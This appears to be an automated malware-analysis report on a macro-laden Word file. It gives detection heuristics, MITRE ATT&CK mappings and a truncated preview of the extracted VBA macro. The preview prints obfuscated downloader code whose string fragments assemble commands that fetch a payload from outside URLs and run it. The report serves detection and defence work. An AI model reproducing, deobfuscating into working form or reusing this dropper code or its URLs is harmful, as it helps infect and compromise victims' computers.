MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The macro utilizes a Shell() call, indicating an attempt to execute an external command, likely to download and run a second-stage payload. The ClamAV detection also points to a phishing lure.
Heuristics 7
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 75765 bytes |
SHA-256: 2f66bde274801eeb6f7cf18ae30f3d58fceb16c7847e20c7f2eb1f45ee5abf91 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "wVnBiCK"
Function BXzwolhbmMOjji()
On Error Resume Next
uMkuGdENCwb = GjqrMSTfTVBFfj - CBool(YopQRwRlI) * 216045258 / Sqr(VJKKAJXF) + wISqNXLtA / Atn(9898) * tMaGhSQN - CDate(376) - Kvowhjr / 3 + IUTMiAOk / FwbtGFRZ
QKADYiziRO = cYZifWFdvu - CBool(DOIJFsP) * 216045258 / Sqr(FzcNXcSdYRqCu) + oSfjZivnrn / Atn(9898) * hXPGwXkS - CDate(376) - dbzLBFM / 3 + hLEsJiaqiYThuS / pBqFCWb
NhtbutdpChF = MuDGHNR + Mid("jdaFAI8dNGdHAz7lMQHPCjVGv:sgu+sgupsgu+sguusgu+sgublic +sgu+sgu cjVG+jVGRCTf6cRC + 1jVG+jVG3isgu+sguksgu+jVG+jVG'+'sguasgu+sgurapas '+'+ sgu+sgucRCsgu+sgu.ej'TcBCW", 22, 136) + UiGkbiPFcditj
zfsRb = wvDcsjwRv - CBool(JKlKWOCYjz) * 216045258 / Sqr(MLVXNSmMD) + XYRhwFjcjPMFt / Atn(9898) * AUoEiEjkaAm - CDate(376) - iFiRJFrfmlTc / 3 + IVvzjCHSuWs / hhzJnwRuNWa
GNjdHciGEji = hokvNDo - CBool(ofEoXuvoa) * 216045258 / Sqr(VkYcjvvkr) + aPldSKaPmAj / Atn(9898) * HBXVbudISCofz - CDate(376) - jEEoAcLJ / 3 + ZubWMUfBamjdX / OUAGjLX
JijqcafKzU = hNmvzjd - CBool(tEEHqSCLRYAGTP) * 216045258 / Sqr(irLddjWrqbAdRj) + nGOClLjcvVZMa / Atn(9898) * zjhSQDDmCzLWMO - CDate(376) - qolbikusQdk / 3 + PPHEXwtsvSLBjj / DOqOwVw
pFAYjRVizL = RGHNNpPBLiVilm + Mid("LjVGgu+sg'+'uasgu+sgudsgu+sguasd.nsjVG+jVGgu+sgu'+'esgu+sguxt(sgu+sgu1sgu'+'+sgu, 343245sgu+sgu);13isgu+sguhsgu+sguuas sgu+sgu= 13ien'+'sgu+sgujVG+NWu9YNXul", 2, 146) + zfQojmncXrVwn
Lzdisljzim = GiGiWLwzEiz - CBool(wbAYRonB) * 216045258 / Sqr(tSjIzpUAW) + wTwnwQhzUDa / Atn(9898) * CfMGnTcpvYWM - CDate(376) - LWVWVdzh / 3 + wqAnDIk / SznLQDwtCAXhh
wXRVoddtiDt = mGOFbaoEHoD - CBool(QtXzZwiuiB) * 216045258 / Sqr(EGZdEUvBAQLBKZ) + lkwJqHJQiC / Atn(9898) * lzCGRukMJ - CDate(376) - CzjjMnDFEsMYEM / 3 + wZLmuqqapjvzt / RQwPWjmMZdUGKd
jwQIqIJ = FYYAuTZ - CBool(TcbAUYtOLSO) * 216045258 / Sqr(PTXMLQWanB) + DbcUZMaqalzf / Atn(9898) * zzfIcrowFjplAM - CDate(376) - iwzqRsXYrDUCl / 3 + onRnaNLkOww / mwvniZAkL
AkfUBLdXHX = zlbltLbzZaA + Mid("0RI6qijVLUEOmCIH1ijMmBD460jz+sgu://jVG+jVGm'+'elb.org/sgu+sgu1sgu+sguoz3i/,sgu+sgu'+'http:/sYizoHSdjWWj", 29, 64) + jVFAQUF
GqlVfVVkd = DMvpNTVY - CBool(PILWuzQnJH) * 216045258 / Sqr(bOIhdGlziSofN) + lXAKjfwrY / Atn(9898) * NXQSaMj - CDate(376) - CqipENLGhVqHac / 3 + FIcQddbrjpHTGq / ZVmscXiwS
KFOrHtr = pbwtOTrjBOV - CBool(cTPILouap) * 216045258 / Sqr(VrDsHWjVji) + itkjtffsShaw / Atn(9898) * UtkPAAvUqSFH - CDate(376) - WLVzfhmkwZfYS / 3 + PiXqvtUX / mTVjnNnbi
PEzHNkNOML = AbXLKdiEiQiY - CBool(jhjJbZjZBXjz) * 216045258 / Sqr(ttJiifwrkz) + wnTYOwiPbOKY / Atn(9898) * FUvlJwDnOokk - CDate(376) - vmDbqwjtKoGKKE / 3 + UWHiVZcJjLimu / kzioTBwMzYMoqu
MMzwhZtRC = zZzaARZkZKJz + Mid("j7FWQ2PXd5D7wK81jvCm'+'guFilsgu+sguesgu+sgu(1sgu+sgu3isgu'+'+sguabc.Tosgu+sguStrisgu+sgung(), 1sgu+sgu3isgu+sguhuas)sgu+sgu;Invosgu+sguksjVG+jVGgu+sgue-jVG+jVGIssEMsbWC7i", 21, 141) + DSbzwzwtFQOwVU
uJNqHMHDGo = CJTWUBsLwWT - CBool(qhqflTc) * 216045258 / Sqr(OVwzjiKA) + WKwAwQzwMCoDhW / Atn(9898) * vhcopHc - CDate(376) - wVOhKWnqqr / 3 + bLVDuRrj / QnGjzwBBBW
zOwkYDv = SNYDIJAZlW - CBool(IFUMpTIDQnVTzW) * 216045258 / Sqr(FwAvOLmK) + pocEGHQA / Atn(9898) * TqFuqzT - CDate(376) - tKjzuajz / 3 + CZpImVv / XArEwJXU
plJXzKB = YDDKOihOUloUjU - CBool(VWYMiCIAEpuJ) * 216045258 / Sqr(GcXTzMS) + moQzAaFnYdiCO / Atn(9898) * DFVnwPCzVT - CDate(376) - dHsOUUUBoi / 3 + HNhbDNfMQHpm / RwLPDonTwb
ZQwjtTABh = ruqzfhio + Mid("SiLAXzandsgu+sguomsgu+sgu;'+'sgu+sgu1sgu+sgu3ibcsgu+sgud = cRCsgu+sguhsgu+sg'+'uttp://ssgu+sgursg'+'u+sguatim.zesesgu+sgux'+'.sgu+sguc'+'o.il/4jVG+jVGEsgu+sgux'+'1Ysgu+sgu/s'+'gu+sgu,htjwjOKtJOc9", 7, 179) + YMzLWvpZiiW
KPzEmzz = ijDKHAbDS - CBool(bLvNvECEqKu) * 216045258 / Sqr(UKiTwcGwBLcd) + zwtuYOEUuTAcmv / Atn(9898) * uFhJWzM - CDate(376) - boCzzVaQiRRvI / 3 + JRwpMZqi / LhGBwdTHznDSG
skbECLqi = MoZMttSzkli - CBool(FvhoRtSmOvBlVi) * 216045258 / Sqr(GOoOXDkYcKDc) + MnF
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.